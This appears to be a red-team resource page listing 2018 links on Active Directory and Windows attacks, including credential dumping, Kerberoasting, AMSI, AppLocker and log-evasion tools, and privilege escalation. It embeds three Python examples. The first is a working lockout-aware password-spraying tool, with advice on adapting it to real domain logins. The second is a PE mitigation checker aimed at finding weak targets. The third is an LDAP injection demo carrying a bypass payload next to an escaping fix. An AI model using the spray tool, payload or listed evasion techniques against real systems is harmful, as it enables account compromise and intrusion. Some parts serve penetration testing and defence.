https://github.com/hausec/ADAPE-Script
Kerberoasting, exploiting unpatched systems – a day in the life of a Red Teamer
http://niiconsulting.com/checkmate/2018/05/kerberoasting-exploiting-unpatched-systems-a-day-in-the-life-of-a-red-teamer/
Understanding and Evading Get-InjectedThread
https://blog.xpnsec.com/undersanding-and-evading-get-injectedthread/
PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.
https://github.com/Mr-Un1k0d3r/PowerLessShell
Dumping Clear-Text Credentials
Office365 ActiveSync Username Enumeration
https://www.sec-1.com/blog/2017/office365-activesync-username-enumeration
This script will attempt to list and get TGTs for those users that have the property
'Do not require Kerberos preauthentication' set (UF_DONT_REQUIRE_PREAUTH).
For those users with such configuration, a John The Ripper output will be generated so
you can send it for cracking.
https://github.com/CoreSecurity/impacket/commit/bada8a719f8ed7be4633514eea94bc768dbaf019
NBNS Spoofing
NTLMv1 Multitool
This tool modifies NTLMv1/NTLMv1-ESS/MSCHAPv2 hashes so they can be cracked with DES Mode 14000 in hashcat
https://github.com/evilmog/ntlmv1-multi/
Invoke-Phant0m
This script walks the thread stacks of the Event Log Service process (a specific svchost.exe) and identifies the Event Log threads in order to kill them. As a result the system will not be able to collect logs, while at the same time the Event Log Service will appear to be running.
https://artofpwn.com/phant0m-killing-windows-event-log.html
https://github.com/hlldz/Invoke-Phant0m
Dumping Active Directory Domain Info – with PowerUpSQL!
15 Ways to Bypass the PowerShell Execution Policy
Elevate, UAC bypass, persistence, privilege escalation, dll hijack techniques
https://github.com/rootm0s/WinPwnage
Abusing DCOM For Yet Another Lateral Movement Technique
Invoke-WMILM
This is a PoC script for various methods to achieve authenticated remote code execution via WMI, without (at least directly) using the Win32_Process class. The type of technique is determined by the "Type" parameter.
https://github.com/Cybereason/Invoke-WMILM/blob/master/README.md
[Kernel Exploitation] 7: Arbitrary Overwrite (Win7 x86)
https://www.abatchy.com/2018/01/kernel-exploitation-7
Active Directory as a C2 (Command & Control)
https://akijosberryblog.wordpress.com/2018/03/17/active-directory-as-a-c2-command-control
Bypassing Device Guard with .NET Assembly Compilation Methods
http://www.exploit-monday.com/2017/07/bypassing-device-guard-with-dotnet-methods.html
DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction
https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
Jumping Network Segregation with RDP
https://rastamouse.me/2017/08/jumping-network-segregation-with-rdp/
PowerShell Shellcode Injection on Win 10 (v1803)
https://blog.cobaltstrike.com/2018/05/24/powershell-shellcode-injection-on-win-10-v1803/
Empire Web v2 Launched, A Web Interface to Powershell empire.
https://github.com/interference-security/empire-web
Hidden Administrative Accounts: BloodHound to the Rescue
https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
Extracting Service Account Passwords with Kerberoasting
https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/
MSDAT (Microsoft SQL Database Attacking Tool) is an open source penetration testing tool that tests the security of Microsoft SQL Databases remotely.
https://github.com/quentinhardy/msdat
Powercat
Netcat: The powershell version.
https://github.com/besimorhino/powercat
Windows Privilege Escalation Methods for Pentesters
Getting Domain Admin with Kerberos Unconstrained Delegation
http://www.labofapenetrationtester.com/2016/02/getting-domain-admin-with-kerberos-unconstrained-delegation.html
Scanning for Active Directory Privileges & Privileged Accounts
Automated AD and Windows test lab deployments with Invoke-ADLabDeployer
Simplifying Password Spraying
https://www.trustwave.com/Resources/SpiderLabs-Blog/Simplifying-Password-Spraying/
A Password Spraying tool for Active Directory Credentials
https://github.com/SpiderLabs/Spray
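The two entries above are about spraying one password across many accounts without tripping the domain lockout policy. The following is an added example written for this page; it is not the SpiderLabs Spray tool or any code from the linked post. It budgets attempts per user from lockoutThreshold and lockoutObservationWindow, measuring the window from the account's last bad attempt (which is when AD resets badPwdCount). The lockout policy, the user list, the password list, the in-memory FakeDirectory and the FakeClock are all constructed stand-ins so the example runs offline; real use would replace try_login with an SMB/LDAP/Kerberos authentication attempt.

```python
"""Lockout-aware password spray (added example; not the SpiderLabs Spray tool).

One password is tried against every user per round, and no user receives more
than (lockoutThreshold - 1 - margin) attempts inside one lockoutObservationWindow.
The window is measured from the account's LAST bad attempt, because that is
when AD resets badPwdCount. FakeDirectory/FakeClock are constructed stand-ins.
"""
import time
from collections import defaultdict, deque
from dataclasses import dataclass
from typing import Callable, Dict, Iterable, List, Optional, Tuple


@dataclass(frozen=True)
class LockoutPolicy:
    threshold: int             # lockoutThreshold; 0 means accounts never lock
    observation_window: float  # lockoutObservationWindow, in seconds


def safe_attempts_per_window(policy: LockoutPolicy, margin: int = 1) -> Optional[int]:
    """Bad attempts to spend per user per window (None = unlimited).
    `margin` keeps headroom for the user's own typos, which also count."""
    if policy.threshold == 0:
        return None
    budget = policy.threshold - 1 - margin
    if budget < 1:
        raise ValueError("lockout policy too strict to spray without locking accounts")
    return budget


def spray(users: Iterable[str], passwords: Iterable[str], policy: LockoutPolicy,
          try_login: Callable[[str, str], bool],
          now: Callable[[], float] = time.monotonic,
          sleep: Callable[[float], None] = time.sleep,
          margin: int = 1) -> List[Tuple[str, str]]:
    users = list(users)
    budget = safe_attempts_per_window(policy, margin)
    attempts: Dict[str, deque] = defaultdict(deque)  # user -> timestamps this window
    found: List[Tuple[str, str]] = []
    cracked = set()
    for password in passwords:                      # one password per round
        for user in users:
            if user in cracked:
                continue
            q = attempts[user]
            if budget is not None:
                if q and now() - q[-1] >= policy.observation_window:
                    q.clear()                       # badPwdCount has reset
                if len(q) >= budget:
                    # Wait out the rest of the window since the last attempt.
                    sleep(max(0.0, policy.observation_window - (now() - q[-1])))
                    q.clear()
            q.append(now())
            if try_login(user, password):
                found.append((user, password))
                cracked.add(user)
    return found


class FakeDirectory:
    """Constructed in-memory domain that enforces lockout the way AD does."""
    def __init__(self, creds: Dict[str, str], policy: LockoutPolicy, now: Callable[[], float]):
        self.creds, self.policy, self.now = creds, policy, now
        self.bad_count: Dict[str, int] = defaultdict(int)
        self.last_bad: Dict[str, float] = {}
        self.locked = set()

    def try_login(self, user: str, password: str) -> bool:
        t = self.now()
        if user in self.last_bad and t - self.last_bad[user] >= self.policy.observation_window:
            self.bad_count[user] = 0
        if user in self.locked:
            raise RuntimeError(f"{user} locked out: the spray was too aggressive")
        if self.creds.get(user) == password:
            self.bad_count[user] = 0
            return True
        self.bad_count[user] += 1
        self.last_bad[user] = t
        if self.policy.threshold and self.bad_count[user] >= self.policy.threshold:
            self.locked.add(user)
        return False


class FakeClock:
    """Virtual clock so the demo's waits are instant."""
    def __init__(self) -> None:
        self.t = 0.0
    def now(self) -> float:
        return self.t
    def sleep(self, seconds: float) -> None:
        self.t += max(0.0, seconds)


def run_demo() -> Tuple[List[Tuple[str, str]], float, List[str]]:
    policy = LockoutPolicy(threshold=3, observation_window=1800)          # constructed
    clock = FakeClock()
    directory = FakeDirectory({"bob": "Summer2018!"}, policy, clock.now)  # constructed
    found = spray(["alice", "bob", "carol"],
                  ["Winter2018!", "Spring2018!", "Summer2018!", "Autumn2018!"],
                  policy, directory.try_login, now=clock.now, sleep=clock.sleep)
    return found, clock.t, sorted(directory.locked)


if __name__ == "__main__":
    print(run_demo())
```

With a threshold of 3 the budget is one attempt per user per window, so four passwords against three users take three full observation windows of virtual time and lock nobody; read the real values from the Default Domain Policy (or a fine-grained password policy, which can be stricter per group) before spraying, and treat the result as a floor on how slow the spray must be.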
Abusing SeLoadDriverPrivilege for privilege escalation
https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/
Exploring PowerShell AMSI and Logging Evasion
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
Weaponizing .SettingContent-ms Extensions for Code Execution
https://www.trustedsec.com/2018/06/weaponizing-settingcontent
WMImplant Post-Exploitation – An Introduction
https://www.fortynorthsecurity.com/wmimplant-post-exploitation-an-introduction
PowerShell: How to get a list of all installed Software on Remote Computers
https://sid-500.com/2018/04/02/powershell-how-to-get-a-list-of-all-installed-software-on-remote-computers
Tokenvator: A Tool to Elevate Privilege using Windows Tokens
Disabling AMSI in JScript with One Simple Trick
https://tyranidslair.blogspot.com/2018/06/disabling-amsi-in-jscript-with-one.html
Inveigh is a PowerShell LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system.
https://github.com/Kevin-Robertson/Inveigh/blob/master/README.md
A multithreaded tool that identifies whether credentials are valid, invalid, or valid with local admin rights across a network at scale via SMB, now with a user hunter.
https://github.com/Raikia/CredNinja
PSScriptAnalyzer is a static code checker for Windows PowerShell modules and scripts. PSScriptAnalyzer checks the quality of Windows PowerShell code by running a set of rules. The rules are based on PowerShell best practices identified by PowerShell Team and the community. It generates DiagnosticResults (errors and warnings) to inform users about potential code defects and suggests possible solutions for improvements.
https://github.com/PowerShell/PSScriptAnalyzer
Bypassing SQL Server Logon Trigger Restrictions
Spoof SSDP replies to phish for NTLM hashes on a network. Creates a fake UPNP device, tricking users into visiting a malicious phishing page.
https://gitlab.com/initstring/evil-ssdp
https://twitter.com/subTee/status/1012657434702123008?s=19
Incapacitating Windows Defender
Red Team Tales 0x01: From MSSQL to RCE
https://www.tarlogic.com/en/blog/red-team-tales-0x01
LethalHTA - A new lateral movement technique using DCOM and HTA
https://codewhitesec.blogspot.com/2018/07/lethalhta.html
What is it that Makes a Microsoft Executable a Microsoft Executable? An Attacker’s and a Defender’s Perspective
https://posts.specterops.io/what-is-it-that-makes-a-microsoft-executable-a-microsoft-executable-b43ac612195e
PowerShell script to enumerate executables with auto-elevation enabled; handy for privilege escalation.
https://gist.github.com/Evilcry/71e03a969689b8fd1297a1803aa4d7cf
Using a SCF File to gather Hashes
A Guide to Attacking Domain Trusts
RE: Evading Autoruns PoCs on Windows 10
https://medium.com/@KyleHanslovan/re-evading-autoruns-pocs-on-windows-10-dd810d7e8a3f
Feature, not bug: DNSAdmin to DC compromise in one line
https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
Beyond LLMNR/NBNS Spoofing – Exploiting Active Directory-Integrated DNS
https://github.com/Kevin-Robertson/Powermad/blob/master/README.md
Elevating AD Domain Access With Write Access on the Domain NC Head
Extracting User Password Data with Mimikatz DCSync
https://blog.stealthbits.com/extracting-user-password-data-with-mimikatz-dcsync/
Passing-the-Hash to NTLM Authenticated Web Applications
https://labs.mwrinfosecurity.com/blog/pth-attacks-against-ntlm-authenticated-web-applications/
Application Whitelisting Bypass and Arbitrary Unsigned Code Execution Technique in winrm.vbs
https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404
Veil Payloads and Veil-Ordnance
https://www.fortynorthsecurity.com/veil-payloads-and-veil-ordnance/
Clear all your logs in linux/windows servers
https://github.com/Rizer0/Log-killer
Catch me if u can: Bypassing Memory Scanners with Cobalt Strike and Gargoyle
https://labs.mwrinfosecurity.com/blog/experimenting-bypassing-memory-scanners-with-cobalt-strike-and-gargoyle
PowerShell module to check if a Windows binary (EXE/DLL) has been compiled with ASLR, DEP, SafeSEH, StrongNaming, and Authenticode.
https://github.com/NetSPI/PESecurity
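PESecurity above reads a binary's mitigation opt-ins; the following is an added example of how that check works, written for this page and not taken from PESecurity. It walks the MZ and PE headers to IMAGE_OPTIONAL_HEADER.DllCharacteristics, where the linker records ASLR (DYNAMIC_BASE), DEP (NX_COMPAT), high-entropy 64-bit ASLR and Control Flow Guard, and also reads IMAGE_FILE_HEADER.Characteristics, because an image with IMAGE_FILE_RELOCS_STRIPPED cannot be rebased, so a DYNAMIC_BASE flag on it gives no randomisation. SafeSEH lives in the load-config directory and is deliberately not parsed here. build_test_header fabricates a minimal header (not a loadable image) so the example runs without a real binary; the flag values are the winnt.h constants.

```python
"""Read exploit-mitigation flags from a PE image (added example; not PESecurity)."""
import struct

# IMAGE_DLLCHARACTERISTICS_* (winnt.h)
HIGH_ENTROPY_VA = 0x0020
DYNAMIC_BASE = 0x0040
NX_COMPAT = 0x0100
NO_SEH = 0x0400
GUARD_CF = 0x4000
# IMAGE_FILE_* characteristics (winnt.h)
RELOCS_STRIPPED = 0x0001
# Optional-header magic values; DllCharacteristics sits at +70 in both layouts
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
DLLCHARACTERISTICS_OFFSET = 70


def pe_security_flags(data: bytes) -> dict:
    """Parse the headers of a PE file held in `data` and report its mitigations."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, _nsect, _ts, _sym, _nsym, opt_size, file_chars = struct.unpack_from(
        "<HHIIIHH", data, coff)
    opt = coff + 20                                # IMAGE_FILE_HEADER is 20 bytes
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC):
        raise ValueError(f"unknown optional header magic 0x{magic:x}")
    if opt_size < DLLCHARACTERISTICS_OFFSET + 2:
        raise ValueError("optional header too short")
    (dll_chars,) = struct.unpack_from("<H", data, opt + DLLCHARACTERISTICS_OFFSET)
    relocs_stripped = bool(file_chars & RELOCS_STRIPPED)
    aslr = bool(dll_chars & DYNAMIC_BASE)
    return {
        "machine": machine,
        "pe32plus": magic == PE32PLUS_MAGIC,
        "aslr": aslr,
        "high_entropy_va": bool(dll_chars & HIGH_ENTROPY_VA),
        "dep": bool(dll_chars & NX_COMPAT),
        "cfg": bool(dll_chars & GUARD_CF),
        "seh": not (dll_chars & NO_SEH),
        "relocs_stripped": relocs_stripped,
        # The loader cannot relocate an image without a .reloc section,
        # so DYNAMIC_BASE without relocations is not real ASLR.
        "effective_aslr": aslr and not relocs_stripped,
    }


def build_test_header(magic: int, dll_chars: int, file_chars: int) -> bytes:
    """Constructed minimal PE header (not a loadable image) for offline testing."""
    opt_size = 0xF0 if magic == PE32PLUS_MAGIC else 0xE0
    machine = 0x8664 if magic == PE32PLUS_MAGIC else 0x14C
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)        # e_lfanew: PE header follows the stub
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, opt_size, file_chars)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<H", opt, DLLCHARACTERISTICS_OFFSET, dll_chars)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    hardened = build_test_header(PE32PLUS_MAGIC,
                                 DYNAMIC_BASE | HIGH_ENTROPY_VA | NX_COMPAT | GUARD_CF, 0x0022)
    weak = build_test_header(PE32_MAGIC, DYNAMIC_BASE, 0x0102 | RELOCS_STRIPPED)
    print(pe_security_flags(hardened))
    print(pe_security_flags(weak))
```

On a real target call `pe_security_flags(open(path, "rb").read())`; the interesting finds are third-party services and drivers where "aslr" is true but "effective_aslr" is false, or where "dep" is false on a network-facing process.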
Exploiting a Windows 10 PagedPool off-by-one overflow (WCTF 2018)
https://j00ru.vexillium.org/2018/07/exploiting-a-windows-10-pagedpool-off-by-one/
Anonymously Enumerating Azure File Resources
Weaponize PDF with embedding SettingContent-ms inside PDF.
https://github.com/DidierStevens/DidierStevensSuite/blob/master/make-pdf-embedded.py
Persistence using GlobalFlags in Image File Execution Options – Hidden from Autoruns.exe
https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe
Compromising a Azure Windows 2008 R2 SP1 VM
https://guptaashish.com/2018/07/04/compromising-a-azure-windows-2008-r2-sp1-vm
Microsoft LAPS Security & Active Directory LAPS Configuration Recon
PowerShell is definitely a "gateway drug" to C#. GhostPack is a collection of new security tools (currently C#) that sidesteps the scrutiny PowerShell monitoring now attracts.
https://github.com/GhostPack
Pass the Hash with Kerberos
https://malicious.link/post/2018/pass-the-hash-with-kerberos/
GhostPack
https://posts.specterops.io/ghostpack-d835018c5fc4
Domain Goodness – How I Learned to LOVE AD Explorer
Another way to get to a system shell – Assistive Technology
Robber : An open source tool for finding executables prone to DLL hijacking
https://github.com/MojtabaTajik/Robber
SafetyKatz: a combination of a slightly modified version of @gentilkiwi's Mimikatz project and @subtee's .NET PE loader.
https://github.com/GhostPack/SafetyKatz
Stored passwords found all over the place after installing Windows in company networks
http://blog.win-fu.com/2017/08/stored-passwords-found-all-over-place.html
Security Fun: Bloodhound, MS16-072 and GPO Discoverability
Netsh DLL Helpers
http://liberty-shell.com/sec/2018/07/28/netshlep/
Post Exploitation Using WMIC (System Command)
Updated PoC Mimikatz Loader for 2018
PoC: https://gist.github.com/caseysmithrc/87f6572547f633f13a8482a0c91fb7b7
One-Liner: https://gist.github.com/xillwillx/96e2c5011577d8583635ad7bf6d4fb58
Notes on Windows Privilege Escalation
http://memorycorruption.org/windows/2018/07/29/Notes-On-Windows-Privilege-Escalation.html
Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin
https://hausec.com/2017/10/21/domain-penetration-testing-using-bloodhound-crackmapexec-mimikatz-to-get-domain-admin
Ultimate AppLocker ByPass List: The goal of this repository is to document the most common techniques to bypass AppLocker.
https://github.com/api0cradle/UltimateAppLockerByPassList/tree/Dev
LDAP Injection Cheat Sheet, Attack Examples & Protection
https://www.checkmarx.com/knowledge/knowledgebase/LDAP
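The cheat sheet above covers LDAP filter injection; the following is an added example written for this page (not code from Checkmarx) that puts the vulnerable construction beside the fixed one. Filter values are escaped per RFC 4515, where backslash, `*`, `(`, `)` and NUL become hex escapes of the form backslash-XX, and attribute names supplied by the client are checked against an allow list, since escaping protects the value position only. `is_single_filter` is a small structural check, added here, that shows how the classic payload turns one filter into two; the payload and attribute list are constructed for the demo.

```python
"""LDAP filter injection: vulnerable vs. escaped construction (added example)."""

# RFC 4515 mandatory escapes; other control bytes are escaped as well.
_FILTER_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}
ALLOWED_ATTRIBUTES = {"uid", "cn", "mail"}        # constructed allow list


def escape_filter_value(value: str) -> str:
    """Escape a string for use as an assertion value inside a search filter."""
    out = []
    for ch in value:
        if ch in _FILTER_ESCAPES:
            out.append(_FILTER_ESCAPES[ch])
        elif ord(ch) < 0x20:
            out.append("\\%02x" % ord(ch))
        else:
            out.append(ch)
    return "".join(out)


def build_login_filter_vulnerable(user: str, password: str) -> str:
    # Raw concatenation: metacharacters in `user` rewrite the filter's structure.
    return f"(&(uid={user})(userPassword={password}))"


def build_login_filter_safe(user: str, password: str) -> str:
    # Escaped values can only ever match literally.
    return (f"(&(uid={escape_filter_value(user)})"
            f"(userPassword={escape_filter_value(password)}))")


def build_lookup_filter(attribute: str, value: str) -> str:
    # Escaping cannot protect the attribute position; allow-list it instead.
    if attribute not in ALLOWED_ATTRIBUTES:
        raise ValueError(f"attribute {attribute!r} not permitted")
    return f"({attribute}={escape_filter_value(value)})"


def is_single_filter(filt: str) -> bool:
    """True when `filt` is exactly one balanced parenthesised expression.

    Escaped parentheses (\\28, \\29) are plain text, so only raw ones count.
    A filter that closes to depth 0 before its end has been split by injection."""
    depth = 0
    for i, ch in enumerate(filt):
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth < 0 or (depth == 0 and i != len(filt) - 1):
                return False
    return depth == 0 and filt.startswith("(")


if __name__ == "__main__":
    payload = "*)(uid=*))(|(uid=*"               # constructed classic bypass
    for f in (build_login_filter_vulnerable(payload, "x"),
              build_login_filter_safe(payload, "x")):
        print(f, "single filter:", is_single_filter(f))
```

Against a real server the vulnerable form becomes `(&(uid=*)(uid=*))(|(uid=*)(userPassword=x))`, and many servers evaluate only the leading `(&(uid=*)(uid=*))`, which matches every entry; the safe form keeps the whole payload inside one assertion value. When user input goes into a DN rather than a filter, the escaping rules differ (RFC 4514), so use the library's DN escaper there instead of this function.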
PowerShell script which allows pausing/unpausing Win32/64 exes
https://github.com/besimorhino/Pause-Process
ASP.NET resource files (.RESX) and deserialisation issues
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/august/aspnet-resource-files-resx-and-deserialisation-issues/
Exploiting XXE Vulnerabilities in IIS/.NET
https://pen-testing.sans.org/blog/2017/12/08/entity-inception-exploiting-iis-net-with-xxe-vulnerabilities
When "ASLR" Is Not Really ASLR - The Case of Incorrect Assumptions and Bad Defaults
https://insights.sei.cmu.edu/cert/2018/08/when-aslr-is-not-really-aslr---the-case-of-incorrect-assumptions-and-bad-defaults.html
Capturing NetNTLM Hashes with Office [DOT] XML Documents
https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents
pOWershell obFUsCation
Copying Files via WMI and PowerShell
https://www.fortynorthsecurity.com/copying-files-via-wmi-and-powershell
Using WinRM Through Meterpreter
https://www.trustedsec.com/2017/09/using-winrm-meterpreter
TBAL: an (accidental?) DPAPI Backdoor for local users
PoC:
https://youtu.be/NIPKMSV-KTw
P0wnedShell:
PowerShell Runspace Post Exploitation Toolkit
https://github.com/Cn33liz/p0wnedShell
mimiDbg:
PowerShell oneliner to retrieve wdigest passwords from the memory
https://github.com/giMini/mimiDbg
Golden Ticket Attack Execution Against AD-Integrated SSO providers
https://www.fractalindustries.com/newsroom/blog/gt-attacks-and-sso
Windows Privilege Escalation Fundamentals
http://www.fuzzysecurity.com/tutorials/16.html
Unstoppable Service:
A pattern for a self-installing Windows service in C# with the "unstoppable" attributes set.
https://github.com/malcomvetter/UnstoppableService
Driver loader for bypassing Windows x64 Driver Signature Enforcement
https://github.com/hfiref0x/TDL
Subverting Sysmon:
Application of a Formalized Security Product Evasion Methodology
Code:
https://github.com/mattifestation/BHUSA2018_Sysmon/tree/master/Code
Slides:
https://github.com/mattifestation/BHUSA2018_Sysmon/blob/master/Slides_Subverting_Sysmon.pdf
Whitepaper:
https://github.com/mattifestation/BHUSA2018_Sysmon/blob/master/Whitepaper_Subverting_Sysmon.pdf
An implementation of PSExec in C#
https://github.com/malcomvetter/CSExec
SMBetray: Backdooring and Breaking Signatures
https://quickbreach.io/2018/08/12/smbetray-backdooring-and-breaking-signatures
https://github.com/QuickBreach/SMBetray.git
ADRecon: Active Directory Recon Blackhat Arsenal 2018
https://www.slideshare.net/mobile/prashant3535/adrecon-bh-usa-2018-arsenal-and-def-con-26-demo-labs-presentation
https://github.com/sense-of-security/adrecon
Ps1jacker:
A tool for generating COM Hijacking payload.
https://github.com/darkw1z/Ps1jacker
DEF CON 26 (2018) – Exploiting Active Directory Administrator Insecurities
https://adsecurity.org/wp-content/uploads/2018/08/2018-DEFCON-ExploitingADAdministratorInsecurities-Metcalf.pdf
From Workstation to Domain Admin: Why Secure Administration isn’t Secure and How to Fix it
https://adsecurity.org/wp-content/uploads/2018/08/us-18-Metcalf-From-Workstation-To-Domain-Admin-Why-Secure-Administration-Isnt-Secure-Final.pdf
Tools for instrumenting Windows Defender's mpengine.dll
https://github.com/0xAlexei/WindowsDefenderTools
Art of Anti Detection 1 – Introduction to AV & Detection Techniques
Ridrelay: Enumerate usernames on a domain where you have no creds by using SMB Relay with low priv.
https://github.com/skorov/ridrelay
Remotely Enumerate Anti-Virus Configurations
https://www.fortynorthsecurity.com/remotely-enumerate-anti-virus-configurations
Juicy Potato (abusing the golden privileges)
https://decoder.cloud/2018/08/10/juicy-potato
Juicy Potato (abusing the golden privileges)
https://ohpe.github.io/juicy-potato
Hacking around HTA files
http://blog.sevagas.com/?Hacking-around-HTA-files
Koadic C3 COM Command & Control - JScript RAT
https://github.com/zerosum0x0/koadic
Phishing – Ask and ye shall receive
https://blog.fox-it.com/2018/08/14/phishing-ask-and-ye-shall-receive
Windows Exploitation Tricks: Exploiting Arbitrary Object Directory Creation for Local Elevation of Privilege
https://googleprojectzero.blogspot.com/2018/08/windows-exploitation-tricks-exploiting.html
Bypass in Microsoft AD FS Multi-Factor Authentication protocol (CVE-2018-8340):
Multi-Factor Mixup: Who Were You Again?
https://www.okta.com/security-blog/2018/08/multi-factor-authentication-microsoft-adfs-vulnerability
Reconerator: C# Targeted Attack Reconnaissance Tools
https://github.com/stufus/reconerator
DCShadow - Minimal permissions, Active Directory Deception, Shadowception and more
http://www.labofapenetrationtester.com/2018/04/dcshadow.html
Skeleton Key Attack
https://pentestlab.blog/2018/04/10/skeleton-key
Arbitrary, Unsigned Code Execution Vector in Microsoft.Workflow.Compiler.exe
https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb
SANS Webcast: PowerShell for PenTesting
https://www.youtube.com/watch?v=a8_DqEVFwO8
Microsoft.Workflow.Compiler.exe Mimikatz Runner.
https://gist.github.com/caseysmithrc/b1190e023cd29c1910c01a164675a22e
List-RDP-Connections-History
Use powershell to list the RDP Connections History of logged-in users or all users
https://github.com/3gstudent/List-RDP-Connections-History
A Universal Windows Bootkit
An analysis of the MBR bootkit referred to as "HDRoot"
http://williamshowalter.com/a-universal-windows-bootkit
Broadcast Name Resolution Poisoning / WPAD Attack Vector
https://p16.praetorian.com/blog/broadcast-name-resolution-poisoning-wpad-attack-vector
.NET Deserialization To NTLM Hashes
https://www.digitalinterruption.com/single-post/2018/04/22/NET-Deserialization-to-NTLM-hashes
Python tool to inject fake updates into unencrypted WSUS traffic
https://github.com/pdjstone/wsuspect-proxy
Remotely Modify Anti-Virus Configurations
https://www.fortynorthsecurity.com/remotely-modify-anti-virus-configurations
Making the Perfect Injector: Abusing Windows Address Sanitization and CoW
Leaking Environment Variables in Windows Explorer via .URL or desktop.ini files
https://insert-script.blogspot.com/2018/08/leaking-environment-variables-in_20.html
Extracting SSH Private Keys from Windows 10 ssh-agent
https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent
Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition)
https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa
CVE-2018-0952: Privilege Escalation Vulnerability in Windows Standard Collector Service
https://www.atredis.com/blog/cve-2018-0952-privilege-escalation-vulnerability-in-windows-standard-collector-service
Operational Guidance for Offensive User DPAPI Abuse
https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107
Kerberoasting and SharpRoast output parsing!
https://grumpy-sec.blogspot.com/2018/08/kerberoasting-and-sharproast-output.html
whitelist_bypass_server
This module is designed to be a platform for testing an endpoint's application-whitelisting effectiveness by providing bypasses for solutions such as Software Restriction Policies and AppLocker.
https://github.com/rapid7/metasploit-framework/pull/8783
Clientside Exploitation - Tricks of the Trade 0x01 - Sharpshooter + SquibblyTwo
https://0x00sec.org/t/clientside-exploitation-tricks-of-the-trade-0x01-sharpshooter-squibblytwo/8178
Privilege Escalation & Post-Exploitation Docs
https://rmusser.net/docs/Privilege Escalation & Post-Exploitation.html
Task Scheduler ALPC exploit (unpatched when released) and PoC by SandboxEscaper
https://github.com/SandboxEscaper/randomrepo/blob/master/PoC-LPE.rar
Remote NTLM relaying through meterpreter on Windows port 445
https://diablohorn.com/2018/08/25/remote-ntlm-relaying-through-meterpreter-on-windows-port-445
Microsoft.Workflow.Compiler.exe, Veil, and Cobalt Strike
https://www.fortynorthsecurity.com/microsoft-workflow-compiler-exe-veil-and-cobalt-strike
Bypassing Workflows Protection Mechanisms - Remote Code Execution on SharePoint
https://www.nccgroup.trust/uk/our-research/technical-advisory-bypassing-workflows-protection-mechanisms-remote-code-execution-on-sharepoint
Having Fun with ActiveX Controls in Microsoft Word
https://www.blackhillsinfosec.com/having-fun-with-activex-controls-in-microsoft-word
Invoke-AtomicTest - Automating MITRE ATT&CK with Atomic Red Team
http://subt0x11.blogspot.com/2018/08/invoke-atomictest-automating-mitre-att.html
AppLocker Bypass - CMSTP
https://pentestlab.blog/2018/05/10/applocker-bypass-cmstp
Persistence using AdminSDHolder and SDProp
https://blog.stealthbits.com/persistence-using-adminsdholder-and-sdprop
Red Teaming Microsoft: Part 1 – Active Directory Leaks via Azure
https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure
Walk-through Mimikatz sekurlsa module
https://jetsecurity.github.io/post/mimikatz/walk-through_sekurlsa
windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems
https://github.com/pentestmonkey/windows-privesc-check
Understanding how DLL Hijacking works
https://astr0baby.wordpress.com/2018/09/08/understanding-how-dll-hijacking-works
Playing with Relayed Credentials
https://www.coresecurity.com/blog/playing-relayed-credentials
DDE Downloaders, Excel Abuse, and a PowerShell Backdoor
http://rinseandrepeatanalysis.blogspot.com/2018/09/dde-downloaders-excel-abuse-and.html
A detailed technical explanation of CVE-2018-8120
https://xiaodaozhi.com/exploit/156.html
A PowerShell example of the Windows zero day priv esc
https://github.com/OneLogicalMyth/zeroday-powershell/blob/master/README.md
You can't contain me! :: Analyzing and Exploiting an Elevation of Privilege Vulnerability in Docker for Windows
https://srcincite.io/blog/2018/08/31/you-cant-contain-me-analyzing-and-exploiting-an-elevation-of-privilege-in-docker-for-windows.html
CVE-2018-8420 - Microsoft XML Core Services MSXML RCE through web browser PoC
https://github.com/Theropord/CVE-2018-8420
Bypassing AppLocker Custom Rules
https://0x09al.github.io/security/applocker/bypass/custom/rules/windows/2018/09/13/applocker-custom-rules-bypass.html
Exploiting STOPzilla AntiMalware Arbitrary Write Vulnerability using SeCreateTokenPrivilege
How to add a module in Mimikatz?
